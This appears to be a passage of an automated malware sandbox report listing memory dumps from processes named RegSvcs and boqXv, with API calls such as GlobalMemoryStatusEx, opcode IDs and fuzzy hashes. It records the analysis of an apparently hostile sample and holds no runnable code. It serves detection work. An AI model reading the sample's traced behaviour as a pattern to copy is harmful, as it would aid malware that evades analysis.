                                                                      • Instruction ID: beceffb93f29133cc34f21cf1d8675b9b4f81a55208f758bd5d54b6247b01988
                                                                      • Opcode Fuzzy Hash: ff1b767abbea523b7a36ef3cec16182e7c9d48fa4a483b69492b77518c6f4e4f
                                                                      • Instruction Fuzzy Hash: 241147B1C0065A9FDB14CF9AD445B9EFBF4FF48320F10812AD918A7240D738A941CFA1

                                                                      Control-flow Graph

                                                                      control_flow_graph (executed/not-executed graph omitted): function at 64ad204-64ae6d5; API GlobalMemoryStatusEx in block 64ae676-64ae6a4.
                                                                      APIs
                                                                      • GlobalMemoryStatusEx.KERNELBASE(4C064ABB), ref: 064AE697
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.2480284818.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_64a0000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemoryStatus
                                                                      • String ID:
                                                                      • API String ID: 1890195054-0
                                                                      • Opcode ID: 47cf17d557096bc3a4ef66e33f1b459cd29879bd878e2ee897c43fca436cbf68
                                                                      • Instruction ID: fae08c036aff0bc1942d27e3a7bda791e4a688d440a200d838352aad05080d5f
                                                                      • Opcode Fuzzy Hash: 47cf17d557096bc3a4ef66e33f1b459cd29879bd878e2ee897c43fca436cbf68
                                                                      • Instruction Fuzzy Hash: B21133B1C0025A9FCB10DF9AC445B9EFBF4AB08220F10852AD918A7340D378A941CFE5

                                                                      Control-flow Graph

                                                                      control_flow_graph (executed/not-executed graph omitted): function at 64ae628-64ae6d5; API GlobalMemoryStatusEx in block 64ae628-64ae6a4.
                                                                      APIs
                                                                      • GlobalMemoryStatusEx.KERNELBASE(4C064ABB), ref: 064AE697
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.2480284818.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_64a0000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemoryStatus
                                                                      • String ID:
                                                                      • API String ID: 1890195054-0
                                                                      • Opcode ID: 96cf3af69370d350d0626c72b12947fed2ceae978157e85e467faebb14e73c78
                                                                      • Instruction ID: e0d0aa3eb0eae5ce0c78a89c6c95e2a4e3f360a1dc5803b3d59cb3605cbbd4ff
                                                                      • Opcode Fuzzy Hash: 96cf3af69370d350d0626c72b12947fed2ceae978157e85e467faebb14e73c78
                                                                      • Instruction Fuzzy Hash: 5C1123B1C0025A9FDB10CF9AD445BDEFBF5AF48320F14852AD928A7340D778A951CFA1

                                                                      Control-flow Graph

                                                                      control_flow_graph (executed/not-executed graph omitted): function at 59aa110-59aafe0; API GetModuleHandleW in block 59aaf98-59aafc3.
                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,059AAD7C), ref: 059AAFB6
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.2479900105.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_59a0000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: b5917e35b91f21f8e9373c4c34e59ddd5602bbc581d8d23be6ec56573e507461
                                                                      • Instruction ID: 9231b22e2c3327b5d1d6518db47f34c96cb94504aeba8506f5729ee3d77968e2
                                                                      • Opcode Fuzzy Hash: b5917e35b91f21f8e9373c4c34e59ddd5602bbc581d8d23be6ec56573e507461
                                                                      • Instruction Fuzzy Hash: 231102B6C043498FCB24DF9AC844B9EFBF9EB88214F10842AD919B7250D379A545CFE1
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.2467621434.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_143d000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a5df7e4a6afe5a3fd084975aab4daf37ed3908846982ef8f4799a57b7ef1aa8f
                                                                      • Instruction ID: feaae46d6fae4e9660c1414ed18c88b66454129b7c94d1903f7e785eda398d85
                                                                      • Opcode Fuzzy Hash: a5df7e4a6afe5a3fd084975aab4daf37ed3908846982ef8f4799a57b7ef1aa8f
                                                                      • Instruction Fuzzy Hash: 0C21F1B1A042009FDB15DF54D984B16FB75EB88618F60C56AD84A0B3A6C336D407CA61
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.2467621434.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_143d000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b0988d6f7b70dae17fcd8fbba4c54c6e02240fcc8f91a51a1f9023370cf946ef
                                                                      • Instruction ID: 79fd3daaa6ae354ed55319e628b9be221b34c8f409db85fa4ab03994e65e65da
                                                                      • Opcode Fuzzy Hash: b0988d6f7b70dae17fcd8fbba4c54c6e02240fcc8f91a51a1f9023370cf946ef
                                                                      • Instruction Fuzzy Hash: BA2180755093808FCB06CF64D590716BF71EB86214F28C5DBD8498F2A7C33A980ACB62
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1358179353.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_1440000_boqXv.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7950077c08cd2f7b57339077d7bc93b9228c3893d041328e8cb06d09142fa5f3
                                                                      • Instruction ID: c99052ccf8f12fddb4a1de693a914abcea0a7cb843b786c2ff2dab3ed9ffd407
                                                                      • Opcode Fuzzy Hash: 7950077c08cd2f7b57339077d7bc93b9228c3893d041328e8cb06d09142fa5f3
                                                                      • Instruction Fuzzy Hash: 25226C74700205DFEB24EF78E8A062A77A6BB88705F55893EC5568739DDB31EC82CB50
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1358179353.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_1440000_boqXv.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8877f19c596bf5e866b62d5f98b88fc530d1f76b3fe34d036bebe6d24fa72540
                                                                      • Instruction ID: c8fe222ff3a4eee8d07992909d190cc5741d21828647312feb33af01e69a9504
                                                                      • Opcode Fuzzy Hash: 8877f19c596bf5e866b62d5f98b88fc530d1f76b3fe34d036bebe6d24fa72540
                                                                      • Instruction Fuzzy Hash: 1381D475A00305CFEB259F74D4186AEBFF2EF88310F18856AD54697368DB71AC96CB40
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1358179353.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_1440000_boqXv.jbxd
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1439848046.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_13d0000_boqXv.jbxd